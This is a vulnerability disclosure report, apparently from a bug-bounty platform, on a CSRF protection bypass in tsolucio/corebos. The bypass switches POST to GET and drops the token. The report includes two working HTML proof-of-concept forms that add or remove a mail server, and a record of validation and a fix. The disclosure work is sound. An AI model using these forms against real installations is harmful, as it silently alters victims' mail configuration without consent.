Bypassing CSRF on Multiple Endpoint in tsolucio/corebos

Valid

Reported on

Jun 26th 2022


Description

It's possible to bypass the CSRF protection which is already implemented on the coreBOS CMS. When some request not contain any valid CSRF token, the webpage will be displayed an error like:

CSRF Error. The reason this happens is that the page has been open without any interaction for too long. For security reason, it has expired. Please reload the page by hitting CTRL + R or press reload below.

Looks like the csrf-magic.php / csrf-magic.js only checked the POST request and ignore the GET request.From this way, CSRF protection can be bypassed by removing the CSRF Token parameter and changing the request from POST to GET.

Proof of Concept

// Add Mail Server - POC .html
<html>
  <body>
    <form action="http://localhost:8888/corebos/index.php">
      <input type="hidden" name="module" value="MailManager" />
      <input type="hidden" name="action" value="MailManagerAjax" />
      <input type="hidden" name="file" value="index" />
      <input type="hidden" name="mode" value="ajax" />
      <input type="hidden" name="&#95;operation" value="settings" />
      <input type="hidden" name="&#95;operationarg" value="save" />
      <input type="hidden" name="&#95;&#95;vt5rftk" value="" />
      <input type="hidden" name="&#95;mbox&#95;server" value="mail&#46;apapedulimu&#46;click" />
      <input type="hidden" name="&#95;mbox&#95;user" value="test&#64;apapedulimu&#46;click" />
      <input type="hidden" name="&#95;mbox&#95;pwd" value="thisisjusttestaccount" />
      <input type="hidden" name="&#95;mbox&#95;protocol" value="IMAP4" />
      <input type="hidden" name="&#95;mbox&#95;ssltype" value="ssl" />
      <input type="hidden" name="&#95;mbox&#95;certvalidate" value="novalidate&#45;cert" />
      <input type="hidden" name="&#95;mbox&#95;refresh&#95;timeout" value="0" />
      <input type="hidden" name="&#95;&#95;vt5rftk" value="" />
      <input type="hidden" name="null" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
// Remove Mail Server - POC .HTML
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost:8888/corebos/index.php">
      <input type="hidden" name="module" value="MailManager" />
      <input type="hidden" name="action" value="MailManagerAjax" />
      <input type="hidden" name="file" value="index" />
      <input type="hidden" name="mode" value="ajax" />
      <input type="hidden" name="&#95;operation" value="settings" />
      <input type="hidden" name="&#95;operationarg" value="remove" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

The attacker can be able to trick the victim into adding or remove the Mail Server. I believe that the trick of bypassing the CSRF can impact many endpoints. But, as an example, I attached 2 endpoints.

Occurrences

The code only check the POST request, and not check the CSRF from GET Request.

We are processing your report and will contact the tsolucio/corebos team within 24 hours. 5 months ago
Nosa Shandy
5 months ago

Researcher


Hi Team,

For clearly Step by Step you can see this video when I reproduce the issue:

https://drive.google.com/file/d/13KZ7nRTMyIN7CiipPrN7ITSjzAkOqRrh/view?usp=sharing

Thanks!

We have contacted a member of the tsolucio/corebos team and are waiting to hear back 5 months ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. 5 months ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. 5 months ago
We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. 4 months ago
Joe Bordes validated this vulnerability 3 months ago
Nosa Shandy has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Joe Bordes marked this as fixed in 8.0 with commit d0bf45 3 months ago
Joe Bordes has been awarded the fix bounty
This vulnerability will not receive a CVE
csrf-magic.php#L203-L206 has been validated
to join this conversation